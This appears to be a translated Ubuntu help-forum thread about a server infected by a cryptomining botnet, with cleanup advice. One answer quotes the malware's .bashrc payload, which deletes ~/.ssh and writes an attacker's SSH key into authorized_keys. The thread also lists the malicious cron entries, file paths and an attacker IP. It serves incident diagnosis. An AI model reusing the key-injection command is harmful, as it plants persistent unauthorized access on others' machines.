Strange Cron Job ocupa el 100% de la CPU Ubuntu 18 LTS Server

21

Sigo apareciendo trabajos cron de weir y no tengo ni idea de lo que hacen. Normalmente publico kill -9 para detenerlos. Ocupan el 100% de mi CPU y pueden funcionar durante días hasta que lo verifique. Alguien sabe que significa esto?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

Estoy ejecutando el servidor Ubuntu 18 LTS completamente actualizado desde ayer 24/07/2019

ACTUALIZAR

Agradezco todos los comentarios. He desconectado todas las unidades de datos y aplicaciones ya que lo único que se vio afectado fue la unidad del sistema operativo, al menos hice ese tipo de cosas correctamente. Voy con una reconstrucción completa, con mucha más seguridad y métodos más seguros.

server cron rsync MCP_infiltrator
fuente
8
.firefoxcatcheprobablemente no tenga nada que ver con firefox, ¿podría ser solo un minero de bitcoin? Intenta subir los ejecutables a virustotal.
Thom Wiggers
1
Los archivos ejecutados por ese crontab son /root/.firefoxcatche/a/updy/root/.firefoxcatche/b/sync
Thom Wiggers
2
"No puedo encontrar el crontab para descifrarlo" ¿qué significa eso? ¿Por qué sudo crontab -eeditar no funciona? Pero si este es un cryptominer que no instaló ... se volverán a agregar. Primero mira en "/root/.firefoxcatche/a/upd" lo que hace.
Rinzwind
2
"¿Tengo que iniciar sesión como root para llegar allí?" Esta es una pregunta que no espero ver de un administrador. Realmente necesitas saber lo que estás haciendo a partir de ahora. Cambie la contraseña de administrador lo antes posible. Inspeccione los archivos enumerados en cron. Erradicarlos.
Rinzwind
1
pero es así de simple ;-) Mantengo más de 10 instancias de Google Cloud. Con un plan de contingencia sobre cualquier cosa que pueda imaginar que salga mal. Si ocurriera algo así, destruiría la instancia raíz, crearía una nueva, escanearía el disco de datos contra un clon, escanearía las diferencias y luego lo adjuntaría a la instancia. y poner en práctica algo para atrapar a esta persona para evitar que vuelva a suceder. En mi caso, mi sueldo depende de ello ;-)
Rinzwind

Respuestas:

40

Lo más probable es que su máquina tenga una infección de cripto minero. Puede ver a alguien más informando nombres de archivo y comportamientos similares en la detección de la vida real de una máquina virtual en Azure con Security Center . Consulte también Mi servidor Ubuntu tiene un virus ... Lo he localizado pero no puedo deshacerme de él ... en Reddit.

Ya no puede confiar en esa máquina y debe volver a instalarla. Tenga cuidado con la restauración de copias de seguridad.

Thom Wiggers
fuente
8
Estoy de acuerdo. la contraseña de root se vio comprometida, así que vuelva a instalarla y tenga mucho cuidado con la copia de seguridad; También podría estar allí.
Rinzwind
9

Su máquina ha sido infectada con un ataque de cripto minero. También me enfrenté a un ataque de ransomware similar en el pasado y mi base de datos se vio comprometida. Tomé un volcado de SQL para la máquina y la reaprovisioné (ya que mi máquina era una VM alojada en AWS EC2). También modifiqué los grupos de seguridad de la máquina para bloquear el acceso SSH y las contraseñas modificadas. También habilité el registro para registrar consultas y exportarlo a S3 todas las noches.

siendoadityak
fuente
4

A mí me pasó lo mismo y me di cuenta ayer. /var/log/syslogRevisé el archivo y esta IP (185.234.218.40) parecía estar ejecutando automáticamente cronjobs.

Lo revisé en http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) y tiene algunos informes. Estos archivos fueron editados por el troyano:

  • .bashrc
  • .ssh / autorizado_claves

Encontré esto al final de .bashrc(que se ejecuta cada vez que se abre bash):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

Está eliminando su authorized_keysarchivo, que es una lista de claves SSH que pueden conectarse sin contraseña. Luego, agrega la clave SSH del atacante:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

Además, encontré esta carpeta: /tmp/.X13-unix/.rsyncdonde está todo el malware. Incluso encontré un archivo, /tmp/.X13-unix/.rsync/c/ipun archivo que contiene 70 000 direcciones IP, que probablemente sean otras víctimas o servidores de nodo.

Hay 2 soluciones: A:

  • Agregue un firewall que bloquee todas las conexiones salientes, excepto el puerto 22 y otros que considere necesarios, y habilite fail2ban, un programa que prohíbe una dirección IP después de X intentos fallidos de contraseña

  • Elimine todos los trabajos cron: ps aux | grep cronluego elimine el PID que aparece

  • Cambie su contraseña a una segura

SI:

  • Haga una copia de seguridad de cualquier archivo o carpeta que necesite o desee

  • Restablezca el servidor y reinstale Ubuntu, o cree directamente una nueva gota

    Como dijo Thom Wiggers, ciertamente eres parte de una botnet de minería de bitcoin y tu servidor tiene una puerta trasera . La puerta trasera emplea un exploit perl, un archivo ubicado aquí: que /tmp/.X13-unix/.rsync/b/runcontiene esto ( https://pastebin.com/ceP2jsUy )

Las carpetas más sospechosas que encontré fueron:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (que fue editado)

  • ~/.firefoxcatche

Finalmente, hay un artículo relacionado con Perl Backdoor aquí: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

Espero que encuentres esto útil.

Oqhax
fuente
Limpié la unidad del sistema operativo y reinstalé Ubuntu, creé una nueva contraseña que es bastante larga y nuevas claves ssh
MCP_infiltrator
Sí, esa es una buena solución :)
Oqhax
Esta fue una respuesta muy útil: gracias por captar el hecho de que se ~/.bashrchabía editado. Encontré que para matar al falso rsynctenía que emitir kill -9 <pid>.
Benny Hill